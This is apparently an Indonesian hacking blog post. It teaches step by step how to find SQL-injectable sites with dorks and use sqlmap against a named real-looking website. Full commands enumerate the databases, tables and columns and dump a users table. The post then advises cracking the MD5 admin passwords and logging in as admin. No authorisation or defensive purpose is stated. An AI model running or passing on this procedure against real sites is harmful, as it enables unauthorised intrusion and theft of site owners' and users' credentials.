SQL MAP | BACKTRACK

1. Siapkan website target
    Dork : sama seperti dork sql injection
    Pilih salah satu website yang kalian inginkan, dalam tutorial ini saya memilih
    http://www.dkggroup.com/main.php?id=121


2. Buka websitenya , kemudian cek website itu apakah ada vuln SQL, caranya tambahkan tanda '
    diakhir url
    Misal website target http://www.dkggroup.com/main.php?id=121 
    tambahkan tanda ' , menjadi http://www.dkggroup.com/main.php?id=121'


3. Kalo muncul pesan "You have an error in your SQL syntax; check the manual ..." berarti ada vuln
    SQL


4. Buka terminal, ketikkan cd /pentest/database/sqlmap/ kemudian tekan enter


5. Ketikkan perintah
    [+] python sqlmap.py -u websitetarget --dbs
    Contoh website saya adalah http://www.dkggroup.com/main.php?id=121, jadi ketikkan di
    terminal :
    python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 --dbs


    Setelah itu tekan enter dan tunggu proses sampai selesai. Dibawah ini adalah tampilan proses yang
    sudah selesai.


6. Didalam kotak merah digambar diatas adalah nama databasenya, kalo sudah dapat nama
    database nya.
    kita ketikkan perintah lagi :
    [+] python sqlmap.py -u websitetarget -D namadatabase --tables
    Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg --tables



    Setelah itu tekan Enter, tunggu prosesnya sampe selesai. Kalo sudah selesai maka akan tampil
    table databasenya.



7. Setelah kalian mendapat table databasenya, silahkan cari table yang menurut kalian berisi
    user+pass admin. Kali ini saya coba scan table uvp_Users, perintahnya :
    [+] python sqlmap.py -u websitetarget -D namadatabase -T namatable --columns
    Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg -T uvp_Users --columns




    Tunggu sampai proses selesai, Setelah selesai kalian akan mendapatkan isi kolom, lihat gambar
    dibawah ini.



8. Setelah itu scan lagi table untuk mendapat user+pass website tersebut. perintahnya :
    [+] python sqlmap.py -u websitetarget -D namadatabase -T namatable --dump
    Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg -T uvp_Users --dump
    Kalo ditengah proses ada error/pertanyaan ketik saja "n", lihat gambar dibawah ini.



    Setelah kalian ketik n, kalian akan mendapat user+pass website tersebut, lihat gambar dibawah
    ini.



    Didalam kotak merah itu adalah user + password website tersebut, tapi password masih dalam
    bentuk md5, decrypt aja kode password itu dengan md5 decrypter, Setelah itu kalian tinggal
    mencari admin login ^_^


Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity